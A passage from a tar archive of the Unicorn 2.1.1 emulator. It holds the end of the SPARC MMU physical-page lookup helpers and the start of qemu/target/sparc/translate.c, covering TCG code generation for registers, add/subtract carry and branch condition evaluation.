target_ulong addr, int rw, int mmu_idx) { target_ulong page_size; int prot, access_index; MemTxAttrs attrs = { 0 }; return get_physical_address(env, phys, &prot, &access_index, &attrs, addr, rw, mmu_idx, &page_size); } #if defined(TARGET_SPARC64) hwaddr cpu_get_phys_page_nofault(CPUSPARCState *env, target_ulong addr, int mmu_idx) { hwaddr phys_addr; if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 4, mmu_idx) != 0) { return -1; } return phys_addr; } #endif hwaddr sparc_cpu_get_phys_page_debug(CPUState *cs, vaddr addr) { SPARCCPU *cpu = SPARC_CPU(cs); CPUSPARCState *env = &cpu->env; hwaddr phys_addr; int mmu_idx = cpu_mmu_index(env, false); if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 2, mmu_idx) != 0) { if (cpu_sparc_get_phys_page(env, &phys_addr, addr, 0, mmu_idx) != 0) { return -1; } } return phys_addr; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/sparc/translate.c���������������������������������������������������������0000664�0000000�0000000�00000712304�14675241067�0020721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* SPARC translation Copyright (C) 2003 Thomas M. Ogrisegg <tom@fnord.at> Copyright (C) 2003-2005 Fabrice Bellard This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "tcg/tcg-op.h" #include "exec/cpu_ldst.h" #include "exec/helper-gen.h" #include "exec/translator.h" #include "asi.h" #define DEBUG_DISAS #define DYNAMIC_PC 1 /* dynamic pc value */ #define JUMP_PC 2 /* dynamic pc value which takes only two values according to jump_pc[T2] */ #define DISAS_EXIT DISAS_TARGET_0 #include "exec/gen-icount.h" typedef struct DisasContext { DisasContextBase base; target_ulong pc; /* current Program Counter: integer or DYNAMIC_PC */ target_ulong npc; /* next PC: integer or DYNAMIC_PC or JUMP_PC */ target_ulong jump_pc[2]; /* used when JUMP_PC pc value is used */ int mem_idx; bool fpu_enabled; bool address_mask_32bit; bool supervisor; #ifdef TARGET_SPARC64 bool hypervisor; #endif uint32_t cc_op; /* current CC operation */ sparc_def_t *def; TCGv_i32 t32[3]; TCGv ttl[5]; int n_t32; int n_ttl; #ifdef TARGET_SPARC64 int fprs_dirty; int asi; #endif // Unicorn struct uc_struct *uc; } DisasContext; typedef struct { TCGCond cond; bool is_bool; bool g1, g2; TCGv c1, c2; } DisasCompare; // This function uses non-native bit order #define GET_FIELD(X, FROM, TO) \ ((X) >> (31 - (TO)) & ((1 << ((TO) - (FROM) + 1)) - 1)) // This function uses the order in the manuals, i.e. bit 0 is 2^0 #define GET_FIELD_SP(X, FROM, TO) \ GET_FIELD(X, 31 - (TO), 31 - (FROM)) #define GET_FIELDs(x,a,b) sign_extend (GET_FIELD(x,a,b), (b) - (a) + 1) #define GET_FIELD_SPs(x,a,b) sign_extend (GET_FIELD_SP(x,a,b), ((b) - (a) + 1)) #ifdef TARGET_SPARC64 #define DFPREG(r) (((r & 1) << 5) | (r & 0x1e)) #define QFPREG(r) (((r & 1) << 5) | (r & 0x1c)) #else #define DFPREG(r) (r & 0x1e) #define QFPREG(r) (r & 0x1c) #endif #define UA2005_HTRAP_MASK 0xff #define V8_TRAP_MASK 0x7f static int sign_extend(int x, int len) { len = 32 - len; return (x << len) >> len; } #define IS_IMM (insn & (1<<13)) static inline TCGv_i32 get_temp_i32(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 t; assert(dc->n_t32 < ARRAY_SIZE(dc->t32)); dc->t32[dc->n_t32++] = t = tcg_temp_new_i32(tcg_ctx); return t; } static inline TCGv get_temp_tl(DisasContext *dc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv t; assert(dc->n_ttl < ARRAY_SIZE(dc->ttl)); dc->ttl[dc->n_ttl++] = t = tcg_temp_new(tcg_ctx); return t; } static inline void gen_update_fprs_dirty(DisasContext *dc, int rd) { #if defined(TARGET_SPARC64) int bit = (rd < 32) ? 1 : 2; TCGContext *tcg_ctx = dc->uc->tcg_ctx; /* If we know we've already set this bit within the TB, we can avoid setting it again. */ if (!(dc->fprs_dirty & bit)) { dc->fprs_dirty |= bit; tcg_gen_ori_i32(tcg_ctx, tcg_ctx->cpu_fprs, tcg_ctx->cpu_fprs, bit); } #endif } /* floating point registers moves */ static TCGv_i32 gen_load_fpr_F(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; #if TCG_TARGET_REG_BITS == 32 if (src & 1) { return TCGV_LOW(tcg_ctx, tcg_ctx->cpu_fpr[src / 2]); } else { return TCGV_HIGH(tcg_ctx, tcg_ctx->cpu_fpr[src / 2]); } #else TCGv_i32 ret = get_temp_i32(dc); if (src & 1) { tcg_gen_extrl_i64_i32(tcg_ctx, ret, tcg_ctx->cpu_fpr[src / 2]); } else { tcg_gen_extrh_i64_i32(tcg_ctx, ret, tcg_ctx->cpu_fpr[src / 2]); } return ret; #endif } static void gen_store_fpr_F(DisasContext *dc, unsigned int dst, TCGv_i32 v) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; #if TCG_TARGET_REG_BITS == 32 if (dst & 1) { tcg_gen_mov_i32(tcg_ctx, TCGV_LOW(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2]), v); } else { tcg_gen_mov_i32(tcg_ctx, TCGV_HIGH(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2]), v); } #else TCGv_i64 t = (TCGv_i64)v; tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_fpr[dst / 2], t, (dst & 1 ? 0 : 32), 32); #endif gen_update_fprs_dirty(dc, dst); } static TCGv_i32 gen_dest_fpr_F(DisasContext *dc) { return get_temp_i32(dc); } static TCGv_i64 gen_load_fpr_D(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; src = DFPREG(src); return tcg_ctx->cpu_fpr[src / 2]; } static void gen_store_fpr_D(DisasContext *dc, unsigned int dst, TCGv_i64 v) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; dst = DFPREG(dst); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], v); gen_update_fprs_dirty(dc, dst); } static TCGv_i64 gen_dest_fpr_D(DisasContext *dc, unsigned int dst) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; return tcg_ctx->cpu_fpr[DFPREG(dst) / 2]; } static void gen_op_load_fpr_QT0(TCGContext *tcg_ctx, unsigned int src) { tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.upper)); tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.lower)); } static void gen_op_load_fpr_QT1(TCGContext *tcg_ctx, unsigned int src) { tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + offsetof(CPU_QuadU, ll.upper)); tcg_gen_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[src/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt1) + offsetof(CPU_QuadU, ll.lower)); } static void gen_op_store_QT0_fpr(TCGContext *tcg_ctx, unsigned int dst) { tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.upper)); tcg_gen_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst/2 + 1], tcg_ctx->cpu_env, offsetof(CPUSPARCState, qt0) + offsetof(CPU_QuadU, ll.lower)); } static void gen_store_fpr_Q(DisasContext *dc, unsigned int dst, TCGv_i64 v1, TCGv_i64 v2) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; dst = QFPREG(dst); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2], v1); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[dst / 2 + 1], v2); gen_update_fprs_dirty(dc, dst); } #ifdef TARGET_SPARC64 static TCGv_i64 gen_load_fpr_Q0(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; src = QFPREG(src); return tcg_ctx->cpu_fpr[src / 2]; } static TCGv_i64 gen_load_fpr_Q1(DisasContext *dc, unsigned int src) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; src = QFPREG(src); return tcg_ctx->cpu_fpr[src / 2 + 1]; } static void gen_move_Q(DisasContext *dc, unsigned int rd, unsigned int rs) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; rd = QFPREG(rd); rs = QFPREG(rs); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2], tcg_ctx->cpu_fpr[rs / 2]); tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[rd / 2 + 1], tcg_ctx->cpu_fpr[rs / 2 + 1]); gen_update_fprs_dirty(dc, rd); } #endif /* moves */ #ifdef TARGET_SPARC64 #define hypervisor(dc) (dc->hypervisor) #define supervisor(dc) (dc->supervisor | dc->hypervisor) #else #define supervisor(dc) (dc->supervisor) #endif #ifdef TARGET_SPARC64 #ifndef TARGET_ABI32 #define AM_CHECK(dc) ((dc)->address_mask_32bit) #else #define AM_CHECK(dc) (1) #endif #endif static inline void gen_address_mask(DisasContext *dc, TCGv addr) { #ifdef TARGET_SPARC64 TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (AM_CHECK(dc)) tcg_gen_andi_tl(tcg_ctx, addr, addr, 0xffffffffULL); #endif } static inline TCGv gen_load_gpr(DisasContext *dc, int reg) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; if (reg > 0) { assert(reg < 32); return tcg_ctx->cpu_regs[reg]; } else { TCGv t = get_temp_tl(dc); tcg_gen_movi_tl(tcg_ctx, t, 0); return t; } } static inline void gen_store_gpr(DisasContext *dc, int reg, TCGv v) { if (reg > 0) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; assert(reg < 32); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_regs[reg], v); } } static inline TCGv gen_dest_gpr(DisasContext *dc, int reg) { if (reg > 0) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; assert(reg < 32); return tcg_ctx->cpu_regs[reg]; } else { return get_temp_tl(dc); } } static inline bool use_goto_tb(DisasContext *s, target_ulong pc, target_ulong npc) { // if (unlikely(s->base.singlestep_enabled || singlestep)) { if (unlikely(s->base.singlestep_enabled)) { return false; } return (pc & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK) && (npc & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK); } static inline void gen_goto_tb(DisasContext *s, int tb_num, target_ulong pc, target_ulong npc) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (use_goto_tb(s, pc, npc)) { /* jump to same page: we can use a direct jump */ tcg_gen_goto_tb(tcg_ctx, tb_num); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, pc); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_npc, npc); tcg_gen_exit_tb(tcg_ctx, s->base.tb, tb_num); } else { /* jump to another page: currently not optimized */ tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_pc, pc); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_npc, npc); tcg_gen_exit_tb(tcg_ctx, NULL, 0); } } // XXX suboptimal static inline void gen_mov_reg_N(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_NEG_SHIFT, 1); } static inline void gen_mov_reg_Z(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_ZERO_SHIFT, 1); } static inline void gen_mov_reg_V(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_OVF_SHIFT, 1); } static inline void gen_mov_reg_C(TCGContext *tcg_ctx, TCGv reg, TCGv_i32 src) { tcg_gen_extu_i32_tl(tcg_ctx, reg, src); tcg_gen_extract_tl(tcg_ctx, reg, reg, PSR_CARRY_SHIFT, 1); } static inline void gen_op_add_cc(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2); tcg_gen_mov_tl(tcg_ctx, dst, tcg_ctx->cpu_cc_dst); } static TCGv_i32 gen_add32_carry32(TCGContext *tcg_ctx) { TCGv_i32 carry_32, cc_src1_32, cc_src2_32; /* Carry is computed from a previous add: (dst < src) */ #if TARGET_LONG_BITS == 64 cc_src1_32 = tcg_temp_new_i32(tcg_ctx); cc_src2_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src1_32, tcg_ctx->cpu_cc_dst); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src2_32, tcg_ctx->cpu_cc_src); #else cc_src1_32 = tcg_ctx->cpu_cc_dst; cc_src2_32 = tcg_ctx->cpu_cc_src; #endif carry_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); #if TARGET_LONG_BITS == 64 tcg_temp_free_i32(tcg_ctx, cc_src1_32); tcg_temp_free_i32(tcg_ctx, cc_src2_32); #endif return carry_32; } static TCGv_i32 gen_sub32_carry32(TCGContext *tcg_ctx) { TCGv_i32 carry_32, cc_src1_32, cc_src2_32; /* Carry is computed from a previous borrow: (src1 < src2) */ #if TARGET_LONG_BITS == 64 cc_src1_32 = tcg_temp_new_i32(tcg_ctx); cc_src2_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src1_32, tcg_ctx->cpu_cc_src); tcg_gen_extrl_i64_i32(tcg_ctx, cc_src2_32, tcg_ctx->cpu_cc_src2); #else cc_src1_32 = tcg_ctx->cpu_cc_src; cc_src2_32 = tcg_ctx->cpu_cc_src2; #endif carry_32 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LTU, carry_32, cc_src1_32, cc_src2_32); #if TARGET_LONG_BITS == 64 tcg_temp_free_i32(tcg_ctx, cc_src1_32); tcg_temp_free_i32(tcg_ctx, cc_src2_32); #endif return carry_32; } static void gen_op_addx_int(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2, int update_cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 carry_32; TCGv carry; switch (dc->cc_op) { case CC_OP_DIV: case CC_OP_LOGIC: /* Carry is known to be zero. Fall back to plain ADD. */ if (update_cc) { gen_op_add_cc(tcg_ctx, dst, src1, src2); } else { tcg_gen_add_tl(tcg_ctx, dst, src1, src2); } return; case CC_OP_ADD: case CC_OP_TADD: case CC_OP_TADDTV: if (TARGET_LONG_BITS == 32) { /* We can re-use the host's hardware carry generation by using an ADD2 opcode. We discard the low part of the output. Ideally we'd combine this operation with the add that generated the carry in the first place. */ carry = tcg_temp_new(tcg_ctx); tcg_gen_add2_tl(tcg_ctx, carry, dst, tcg_ctx->cpu_cc_src, src1, tcg_ctx->cpu_cc_src2, src2); tcg_temp_free(tcg_ctx, carry); goto add_done; } carry_32 = gen_add32_carry32(tcg_ctx); break; case CC_OP_SUB: case CC_OP_TSUB: case CC_OP_TSUBTV: carry_32 = gen_sub32_carry32(tcg_ctx); break; default: /* We need external help to produce the carry. */ carry_32 = tcg_temp_new_i32(tcg_ctx); gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); break; } #if TARGET_LONG_BITS == 64 carry = tcg_temp_new(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); #else carry = carry_32; #endif tcg_gen_add_tl(tcg_ctx, dst, src1, src2); tcg_gen_add_tl(tcg_ctx, dst, dst, carry); tcg_temp_free_i32(tcg_ctx, carry_32); #if TARGET_LONG_BITS == 64 tcg_temp_free(tcg_ctx, carry); #endif add_done: if (update_cc) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_ADDX); dc->cc_op = CC_OP_ADDX; } } static inline void gen_op_sub_cc(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_sub_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2); tcg_gen_mov_tl(tcg_ctx, dst, tcg_ctx->cpu_cc_dst); } static void gen_op_subx_int(DisasContext *dc, TCGv dst, TCGv src1, TCGv src2, int update_cc) { TCGContext *tcg_ctx = dc->uc->tcg_ctx; TCGv_i32 carry_32; TCGv carry; switch (dc->cc_op) { case CC_OP_DIV: case CC_OP_LOGIC: /* Carry is known to be zero. Fall back to plain SUB. */ if (update_cc) { gen_op_sub_cc(tcg_ctx, dst, src1, src2); } else { tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); } return; case CC_OP_ADD: case CC_OP_TADD: case CC_OP_TADDTV: carry_32 = gen_add32_carry32(tcg_ctx); break; case CC_OP_SUB: case CC_OP_TSUB: case CC_OP_TSUBTV: if (TARGET_LONG_BITS == 32) { /* We can re-use the host's hardware carry generation by using a SUB2 opcode. We discard the low part of the output. Ideally we'd combine this operation with the add that generated the carry in the first place. */ carry = tcg_temp_new(tcg_ctx); tcg_gen_sub2_tl(tcg_ctx, carry, dst, tcg_ctx->cpu_cc_src, src1, tcg_ctx->cpu_cc_src2, src2); tcg_temp_free(tcg_ctx, carry); goto sub_done; } carry_32 = gen_sub32_carry32(tcg_ctx); break; default: /* We need external help to produce the carry. */ carry_32 = tcg_temp_new_i32(tcg_ctx); gen_helper_compute_C_icc(tcg_ctx, carry_32, tcg_ctx->cpu_env); break; } #if TARGET_LONG_BITS == 64 carry = tcg_temp_new(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, carry, carry_32); #else carry = carry_32; #endif tcg_gen_sub_tl(tcg_ctx, dst, src1, src2); tcg_gen_sub_tl(tcg_ctx, dst, dst, carry); tcg_temp_free_i32(tcg_ctx, carry_32); #if TARGET_LONG_BITS == 64 tcg_temp_free(tcg_ctx, carry); #endif sub_done: if (update_cc) { tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, dst); tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_cc_op, CC_OP_SUBX); dc->cc_op = CC_OP_SUBX; } } static inline void gen_op_mulscc(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { TCGv r_temp, zero, t0; r_temp = tcg_temp_new(tcg_ctx); t0 = tcg_temp_new(tcg_ctx); /* old op: if (!(env->y & 1)) T1 = 0; */ zero = tcg_const_tl(tcg_ctx, 0); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src, src1, 0xffffffff); tcg_gen_andi_tl(tcg_ctx, r_temp, tcg_ctx->cpu_y, 0x1); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, src2, 0xffffffff); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, tcg_ctx->cpu_cc_src2, r_temp, zero, zero, tcg_ctx->cpu_cc_src2); tcg_temp_free(tcg_ctx, zero); // b2 = T0 & 1; // env->y = (b2 << 31) | (env->y >> 1); tcg_gen_extract_tl(tcg_ctx, t0, tcg_ctx->cpu_y, 1, 31); tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_y, t0, tcg_ctx->cpu_cc_src, 31, 1); // b1 = N ^ V; gen_mov_reg_N(tcg_ctx, t0, tcg_ctx->cpu_psr); gen_mov_reg_V(tcg_ctx, r_temp, tcg_ctx->cpu_psr); tcg_gen_xor_tl(tcg_ctx, t0, t0, r_temp); tcg_temp_free(tcg_ctx, r_temp); // T0 = (b1 << 31) | (T0 >> 1); // src1 = T0; tcg_gen_shli_tl(tcg_ctx, t0, t0, 31); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, 1); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src, t0); tcg_temp_free(tcg_ctx, t0); tcg_gen_add_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_src, tcg_ctx->cpu_cc_src2); tcg_gen_mov_tl(tcg_ctx, dst, tcg_ctx->cpu_cc_dst); } static inline void gen_op_multiply(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2, int sign_ext) { #if TARGET_LONG_BITS == 32 if (sign_ext) { tcg_gen_muls2_tl(tcg_ctx, dst, tcg_ctx->cpu_y, src1, src2); } else { tcg_gen_mulu2_tl(tcg_ctx, dst, tcg_ctx->cpu_y, src1, src2); } #else TCGv t0 = tcg_temp_new_i64(tcg_ctx); TCGv t1 = tcg_temp_new_i64(tcg_ctx); if (sign_ext) { tcg_gen_ext32s_i64(tcg_ctx, t0, src1); tcg_gen_ext32s_i64(tcg_ctx, t1, src2); } else { tcg_gen_ext32u_i64(tcg_ctx, t0, src1); tcg_gen_ext32u_i64(tcg_ctx, t1, src2); } tcg_gen_mul_i64(tcg_ctx, dst, t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_gen_shri_i64(tcg_ctx, tcg_ctx->cpu_y, dst, 32); #endif } static inline void gen_op_umul(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { /* zero-extend truncated operands before multiplication */ gen_op_multiply(tcg_ctx, dst, src1, src2, 0); } static inline void gen_op_smul(TCGContext *tcg_ctx, TCGv dst, TCGv src1, TCGv src2) { /* sign-extend truncated operands before multiplication */ gen_op_multiply(tcg_ctx, dst, src1, src2, 1); } // 1 static inline void gen_op_eval_ba(TCGContext *tcg_ctx, TCGv dst) { tcg_gen_movi_tl(tcg_ctx, dst, 1); } // Z static inline void gen_op_eval_be(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_Z(tcg_ctx, dst, src); } // Z | (N ^ V) static inline void gen_op_eval_ble(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_N(tcg_ctx, t0, src); gen_mov_reg_V(tcg_ctx, dst, src); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); gen_mov_reg_Z(tcg_ctx, t0, src); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // N ^ V static inline void gen_op_eval_bl(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_V(tcg_ctx, t0, src); gen_mov_reg_N(tcg_ctx, dst, src); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // C | Z static inline void gen_op_eval_bleu(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_Z(tcg_ctx, t0, src); gen_mov_reg_C(tcg_ctx, dst, src); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // C static inline void gen_op_eval_bcs(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_C(tcg_ctx, dst, src); } // V static inline void gen_op_eval_bvs(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_V(tcg_ctx, dst, src); } // 0 static inline void gen_op_eval_bn(TCGContext *tcg_ctx, TCGv dst) { tcg_gen_movi_tl(tcg_ctx, dst, 0); } // N static inline void gen_op_eval_bneg(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_N(tcg_ctx, dst, src); } // !Z static inline void gen_op_eval_bne(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_Z(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !(Z | (N ^ V)) static inline void gen_op_eval_bg(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_op_eval_ble(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !(N ^ V) static inline void gen_op_eval_bge(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_op_eval_bl(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !(C | Z) static inline void gen_op_eval_bgu(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_op_eval_bleu(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !C static inline void gen_op_eval_bcc(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_C(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !N static inline void gen_op_eval_bpos(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_N(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } // !V static inline void gen_op_eval_bvc(TCGContext *tcg_ctx, TCGv dst, TCGv_i32 src) { gen_mov_reg_V(tcg_ctx, dst, src); tcg_gen_xori_tl(tcg_ctx, dst, dst, 0x1); } /* FPSR bit field FCC1 | FCC0: 0 = 1 < 2 > 3 unordered */ static inline void gen_mov_reg_FCC0(TCGContext *tcg_ctx, TCGv reg, TCGv src, unsigned int fcc_offset) { tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC0_SHIFT + fcc_offset); tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); } static inline void gen_mov_reg_FCC1(TCGContext *tcg_ctx, TCGv reg, TCGv src, unsigned int fcc_offset) { tcg_gen_shri_tl(tcg_ctx, reg, src, FSR_FCC1_SHIFT + fcc_offset); tcg_gen_andi_tl(tcg_ctx, reg, reg, 0x1); } // !0: FCC0 | FCC1 static inline void gen_op_eval_fbne(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_or_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 1 or 2: FCC0 ^ FCC1 static inline void gen_op_eval_fblg(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_xor_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 1 or 3: FCC0 static inline void gen_op_eval_fbul(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); } // 1: FCC0 & !FCC1 static inline void gen_op_eval_fbl(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { TCGv t0 = tcg_temp_new(tcg_ctx); gen_mov_reg_FCC0(tcg_ctx, dst, src, fcc_offset); gen_mov_reg_FCC1(tcg_ctx, t0, src, fcc_offset); tcg_gen_andc_tl(tcg_ctx, dst, dst, t0); tcg_temp_free(tcg_ctx, t0); } // 2 or 3: FCC1 static inline void gen_op_eval_fbug(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) { gen_mov_reg_FCC1(tcg_ctx, dst, src, fcc_offset); } // 2: !FCC0 & FCC1 static inline void gen_op_eval_fbg(TCGContext *tcg_ctx, TCGv dst, TCGv src, unsigned int fcc_offset) 